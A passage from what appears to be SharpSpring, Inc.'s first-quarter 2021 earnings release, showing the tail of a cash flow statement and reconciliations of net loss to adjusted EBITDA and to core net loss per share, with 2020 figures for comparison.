Lease liabilities	(193,375)	421,089
Accrued expenses and other current liabilities	553,640	(394,239)
Deferred revenue	111,439	(94,289)
Net cash provided by (used in) operating activities	(1,374,290)	(1,644,429)

Cash flows from investing activities
Purchases of property and equipment	(29,871)	(140,930)
Capitalization of software development costs	(67,574)	(272,282)
Net cash used in investing activities	(97,445)	(413,212)

Cash flows used in financing activities:
Proceeds from line of credit	-	1,900,000
Proceeds from exercise of stock options, net	180,087	11,174
Payments for taxes related to net share settlement of equity awards	(25,018)	(26,533)
Net cash provided by financing activities	155,069	1,884,641

Effect of exchange rate on cash	(91,191)	(83,900)

Change in cash and cash equivalents	(1,407,857)	(256,900)

Cash and cash equivalents, beginning of period	28,267,792	11,881,949

Cash and cash equivalents, end of period	$26,859,935	$11,625,049

SharpSpring, Inc.
RECONCILIATION TO ADJUSTED EBITDA
(Unaudited, in Thousands)

	Three Months Ended
	March 31,
	2021	2020
Net loss	$(2,584)	$(988)
Provision (benefit) for income taxes	7	(1,563)
Other (income) expense, net	(7)	57
Gain on extinguishment of debt	(167)	-
Depreciation & amortization	444	357
Non-cash stock compensation	556	371
Adjusted EBITDA	$(1,751)	$(1,766)

SharpSpring, Inc.
RECONCILIATION TO CORE NET LOSS AND CORE NET LOSS PER SHARE
(Unaudited, in Thousands)

	Three Months Ended
	March 31,
	2021	2020
Net loss	$(2,584)	$(988)
Amortization of intangible assets	172	153
Non-cash stock compensation	556	371
Tax adjustment	2	(321)
Core net loss	(1,854)	(785)

Core net loss per share	$(0.14)	$(0.07)
Weighted average common shares outstanding	12,814	11,521